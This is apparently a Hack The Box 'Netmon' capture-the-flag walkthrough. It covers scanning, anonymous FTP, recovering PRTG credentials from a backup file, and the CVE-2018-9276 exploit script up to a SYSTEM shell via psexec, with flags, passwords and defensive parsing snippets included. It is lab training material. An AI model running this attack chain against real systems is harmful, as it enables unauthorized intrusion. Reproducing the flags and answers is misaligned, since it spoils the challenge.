Contents
1. What is the name of the application running on port 80? Given the three words in the logo.
2. What service is running on TCP port 21?
3. Submit the flag located on the Public user's desktop.
   (Knowing which ports the target has open, run an nmap script/service scan against just those ports)
   USER_FLAG: c0ee82f7d9d81b46ef1f1798df6f5c9f
4. What is the full path of the folder where PRTG Network Monitor saves its configuration files by default?
5. What is the name of the backup config file?
6. What was the prtgadmin user's password according to that file?
7. What is the prtgadmin user's password on the website now?
8. What version of PRTG is installed?
9. Which user is this software running as by default? Don't include anything before a \.
10. Submit the flag located on the administrator's desktop.
   ROOT_FLAG: 5c015c28bfab41b355444909d4fd0509
Connect to the HTB VPN server and start the target machine.
Target IP: 10.10.10.152
Assigned IP: 10.10.16.7
1.What is the name of the application running on port 80? Given the three words in the logo.
Use nmap to run a default-script and service-version scan against port 80 of the target:
nmap -p 80 -sCV {TARGET_IP}
From the scan result, the web application is: PRTG Network Monitor
2.What service is running on TCP port 21?
Use nmap to run a default-script and service-version scan against port 21 of the target:
nmap -p 21 -sC -sV {TARGET_IP}
From the scan result, the service hosted on this port is: ftp
3.Submit the flag located on the Public user's desktop.
I first scan the target's ports to learn which ones are open; fscan is quicker for this:
┌──(root㉿kali)-[/home/kali/Desktop]
└─# fscan -nopoc -nobr -no -h 10.10.10.152
fscan version: 1.8.4
start infoscan
10.10.10.152:80 open
10.10.10.152:21 open
10.10.10.152:135 open
10.10.10.152:139 open
10.10.10.152:445 open
[*] alive ports len is: 5
start vulscan
[*] WebTitle http://10.10.10.152 code:302 len:0 title:None 跳转url: http://10.10.10.152/index.htm
[*] NetInfo
[*]10.10.10.152
[->]netmon
[->]10.10.10.152
[->]dead:beef::397e:d785:b7a2:2d2d
[*] WebTitle http://10.10.10.152/index.htm code:200 len:33628 title:Welcome | PRTG Network Monitor (NETMON)
已完成 5/5
[*] 扫描结束,耗时: 4.476236249s
Knowing which ports the target has open, run an nmap script/service scan against just those ports.
Use nmap with the ports specified to run a default-script and service-version scan:
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -p 21,80,135,139,445 -sCV 10.10.10.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 08:25 EDT
Nmap scan report for 10.10.10.152
Host is up (0.12s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19 12:18AM 1024 .rnd
| 02-25-19 10:15PM <DIR> inetpub
| 07-16-16 09:18AM <DIR> PerfLogs
| 02-25-19 10:56PM <DIR> Program Files
| 02-03-19 12:28AM <DIR> Program Files (x86)
| 02-03-19 08:08AM <DIR> Users
|_11-10-23 10:20AM <DIR> Windows
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-server-header: PRTG/18.1.37.13946
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -11m39s, deviation: 0s, median: -11m39s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-10-13T12:14:31
|_ start_date: 2024-10-13T12:07:50

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.57 seconds
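The nmap output above already shows the three weaknesses this box turns on: anonymous FTP, SMB signing that is not enforced, and the PRTG version disclosed in the Server header. As an added example that is not part of the original writeup, this Python snippet parses that output and flags those findings so a scan of your own hosts can be triaged the same way; the sample input is a trimmed copy of the scan above, and the finding labels are this example's own.

```python
import re

# Constructed sample: the relevant lines of the nmap -sCV output above, trimmed.
NMAP_OUTPUT = """\
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|_    Message signing enabled but not required
"""

# "<port>/<proto> <state> <service> <version...>" as printed by nmap normal output
PORT_RE = re.compile(r"^(\d+/(?:tcp|udp))\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_nmap(text):
    """Group NSE script lines under the port (or the host section) they belong to."""
    sections, current = {}, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = m.group(1)
            sections[current] = {"state": m.group(2), "service": m.group(3),
                                 "version": m.group(4).strip(), "script": []}
        elif line.startswith("Host script results"):
            current = "host"
            sections[current] = {"state": "", "service": "", "version": "", "script": []}
        elif current is not None and line.startswith("|"):
            # strip the "| " / "|_ " script-output prefix and any indentation
            sections[current]["script"].append(line.lstrip("|_ ").rstrip())
    return sections

def audit(sections):
    """Return (port, issue) pairs for the weaknesses this box exposed."""
    findings = []
    for port, sec in sections.items():
        script = "\n".join(sec["script"])
        if "Anonymous FTP login allowed" in script:
            findings.append((port, "anonymous FTP login allowed"))
        if "message_signing: disabled" in script:
            findings.append((port, "SMB1 message signing disabled"))
        if "Message signing enabled but not required" in script:
            findings.append((port, "SMB2 message signing not required"))
        m = re.search(r"http-server-header: PRTG/([\d.]+)", script)
        if m:
            findings.append((port, f"PRTG version {m.group(1)} disclosed in Server header"))
    return findings
```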
First, try logging in to the target's FTP server as Anonymous:
After connecting, change to the Users\Public\Desktop path and download user.txt to the local machine.
┌──(root㉿kali)-[/home/kali/Desktop]
└─# ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:kali): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||50235|)
125 Data connection already open; Transfer starting.
02-03-19 12:18AM 1024 .rnd
02-25-19 10:15PM <DIR> inetpub
07-16-16 09:18AM <DIR> PerfLogs
02-25-19 10:56PM <DIR> Program Files
02-03-19 12:28AM <DIR> Program Files (x86)
02-03-19 08:08AM <DIR> Users
11-10-23 10:20AM <DIR> Windows
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||50236|)
125 Data connection already open; Transfer starting.
02-25-19 11:44PM <DIR> Administrator
01-15-24 11:03AM <DIR> Public
226 Transfer complete.
ftp> cd Administrator
550 Access is denied.
ftp> dir
229 Entering Extended Passive Mode (|||50237|)
125 Data connection already open; Transfer starting.
02-25-19 11:44PM <DIR> Administrator
01-15-24 11:03AM <DIR> Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> cd Desktop
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||50239|)
125 Data connection already open; Transfer starting.
02-03-19 12:18AM 1195 PRTG Enterprise Console.lnk
02-03-19 12:18AM 1160 PRTG Network Monitor.lnk
10-13-24 08:08AM 34 user.txt
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||50249|)
125 Data connection already open; Transfer starting.
100% |********************************************************************| 34 0.22 KiB/s 00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (0.15 KiB/s)
ftp> exit
221 Goodbye.
Back on the local machine, view the contents of user.txt:
cat user.txt
USER_FLAG:c0ee82f7d9d81b46ef1f1798df6f5c9f
4.What is the full path of the folder where PRTG Network Monitor saves its configuration files by default?
The default path where PRTG Network Monitor saves its configuration files is:
C:\ProgramData\Paessler\PRTG Network Monitor
5.What is the name of the backup config file?
Reconnect to the target's FTP server as Anonymous:
ftp {TARGET_IP}
List all entries in the current directory:
ls -a
Change to the ProgramData directory:
cd ProgramData
List all files in that folder:
ls -a
ftp> ls -a
229 Entering Extended Passive Mode (|||49870|)
150 Opening ASCII mode data connection.
02-03-19 08:05AM <DIR> Application Data
12-15-21 10:40AM <DIR> Corefig
02-03-19 08:05AM <DIR> Desktop
02-03-19 08:05AM <DIR> Documents
02-03-19 12:15AM <DIR> Licenses
11-20-16 10:36PM <DIR> Microsoft
02-03-19 12:18AM <DIR> Paessler
02-03-19 08:05AM <DIR> regid.1991-06.com.microsoft
07-16-16 09:18AM <DIR> SoftwareDistribution
02-03-19 08:05AM <DIR> Start Menu
02-03-19 12:15AM <DIR> TEMP
02-03-19 08:05AM <DIR> Templates
11-20-16 10:19PM <DIR> USOPrivate
11-20-16 10:19PM <DIR> USOShared
02-25-19 10:56PM <DIR> VMware
226 Transfer complete.
Change to the Paessler directory:
cd Paessler
List all files in that directory:
ls -a
Change to the PRTG Network Monitor directory:
cd "PRTG Network Monitor"
List all files in that directory:
ls -a
ftp> cd Paessler
250 CWD command successful.
ftp> ls -a
229 Entering Extended Passive Mode (|||49892|)
125 Data connection already open; Transfer starting.
10-14-24 12:24AM <DIR> PRTG Network Monitor
226 Transfer complete.
ftp> cd "PRTG Network Monitor"
250 CWD command successful.
ftp> ls -a
229 Entering Extended Passive Mode (|||49902|)
125 Data connection already open; Transfer starting.
10-14-24 12:23AM <DIR> Configuration Auto-Backups
10-14-24 12:23AM <DIR> Log Database
02-03-19 12:18AM <DIR> Logs (Debug)
02-03-19 12:18AM <DIR> Logs (Sensors)
02-03-19 12:18AM <DIR> Logs (System)
10-14-24 12:23AM <DIR> Logs (Web Server)
10-14-24 12:23AM <DIR> Monitoring Database
02-25-19 10:54PM 1189697 PRTG Configuration.dat
02-25-19 10:54PM 1189697 PRTG Configuration.old
07-14-18 03:13AM 1153755 PRTG Configuration.old.bak
10-14-24 12:24AM 1639759 PRTG Graph Data Cache.dat
02-25-19 11:00PM <DIR> Report PDFs
02-03-19 12:18AM <DIR> System Information Database
02-03-19 12:40AM <DIR> Ticket Database
02-03-19 12:18AM <DIR> ToDo Database
226 Transfer complete.
In this directory the backup file can be seen: PRTG Configuration.old.bak
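Because the FTP root is the C: drive, the PRTG data directory and its stale configuration backups are readable by the anonymous user. As an added example that is not part of the original writeup, this Python snippet parses a Microsoft FTP directory listing and reports which PRTG configuration files (live or backup) are exposed, oldest first; the sample listing is copied from the session above, and the file-name prefix and suffix checks are this example's own assumptions.

```python
import re
from datetime import datetime

# Constructed sample: the "ls -a" listing of the PRTG data directory above (trimmed).
LISTING = """\
10-14-24 12:23AM <DIR> Configuration Auto-Backups
10-14-24 12:23AM <DIR> Log Database
02-25-19 10:54PM 1189697 PRTG Configuration.dat
02-25-19 10:54PM 1189697 PRTG Configuration.old
07-14-18 03:13AM 1153755 PRTG Configuration.old.bak
10-14-24 12:24AM 1639759 PRTG Graph Data Cache.dat
02-25-19 11:00PM <DIR> Report PDFs
"""

# Microsoft ftpd "dir" line: MM-DD-YY HH:MMAM|PM  <DIR>|size  name
ENTRY_RE = re.compile(r"^(\d{2}-\d{2}-\d{2})\s+(\d{2}:\d{2}[AP]M)\s+(<DIR>|\d+)\s+(.+)$")
CONFIG_PREFIX = "PRTG Configuration"          # assumption: live config and its copies
CONFIG_SUFFIXES = (".dat", ".old", ".bak")    # assumption: extensions worth flagging

def parse_listing(text):
    """Parse listing lines into (mtime, is_dir, size, name) tuples; skip status lines."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        mtime = datetime.strptime(f"{m.group(1)} {m.group(2)}", "%m-%d-%y %I:%M%p")
        is_dir = m.group(3) == "<DIR>"
        size = 0 if is_dir else int(m.group(3))
        entries.append((mtime, is_dir, size, m.group(4)))
    return entries

def exposed_config_files(entries):
    """Names of PRTG configuration files reachable in the listing, oldest first.
    Old copies are listed first because forgotten backups are the usual leak."""
    hits = [e for e in entries
            if not e[1] and e[3].startswith(CONFIG_PREFIX)
            and e[3].lower().endswith(CONFIG_SUFFIXES)]
    hits.sort(key=lambda e: e[0])
    return [e[3] for e in hits]
```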
6.What was the prtgadmin user's password according to that file?
Download the backup file to the local machine:
get "PRTG Configuration.old.bak"
Exit the FTP server:
exit
View the contents of the backup file (the name contains spaces, so it must be quoted):
cat "PRTG Configuration.old.bak"
Account: prtgadmin
Password: PrTg@dmin2018
7.What is the prtgadmin user's password on the website now?
Since the credentials obtained above come from a backup file, and the password may be rotated from time to time,
we try variations on the password's format, e.g. PrTg@dmin2017, PrTg@dmin2019, PrTg@dmin2020.
The correct credentials for the website turn out to be:
Account: prtgadmin
Password: PrTg@dmin2019
8.What version of PRTG is installed?
Log in to the web page with the credentials above:
In the Update Available box at the bottom left, the current version can be seen: 18.1.37.13946
9.Which user is this software running as by default? Don't include anything before a \.
Search for known exploits affecting this version of PRTG:
searchsploit PRTG
Copy the first exploit to the local machine:
searchsploit -m windows/webapps/46527.sh
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m windows/webapps/46527.sh
Exploit: PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution
URL: https://www.exploit-db.com/exploits/46527
Path: /usr/share/exploitdb/exploits/windows/webapps/46527.sh
Codes: CVE-2018-9276
Verified: False
File Type: Bourne-Again shell script, ASCII text executable, with very long lines (2429)
Copied to: /home/kali/Desktop/temp/46527.sh
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ls
46527.sh
The CVE ID of this vulnerability can be seen to be: CVE-2018-9276
After logging in to the page in the browser with the credentials,
use the Cookie-Editor extension to view the cookie value:
Inspecting the script's contents with the strings command shows that at minimum a cookie and a URL are required as parameters; try running the script directly:
./46527.sh -u http://{TARGET_IP} -c {YOUR_COOKIE}
It reports that the user was created successfully, with the following credentials:
Account: pentest
Password: P3nT3st!
Use the psexec.py script to connect to the target:
python psexec.py pentest:'P3nT3st!'@{TARGET_IP}
Running the whoami command shows that the current user is: system
10.Submit the flag located on the administrator's desktop.
Change to the root of the C: drive:
cd /
Search for the root.txt file:
dir /s root.txt
View the contents of root.txt:
type C:\Users\Administrator\Desktop\root.txt
C:\Windows\system32> cd /
C:\> dir /s root.txt
Volume in drive C has no label.
Volume Serial Number is 0EF5-E5E5

Directory of C:\Users\Administrator\Desktop

10/14/2024 12:23 AM 34 root.txt
1 File(s) 34 bytes

Total Files Listed:
1 File(s) 34 bytes
0 Dir(s) 6,739,435,520 bytes free

C:\> type C:\Users\Administrator\Desktop\root.txt
5c015c28bfab41b355444909d4fd0509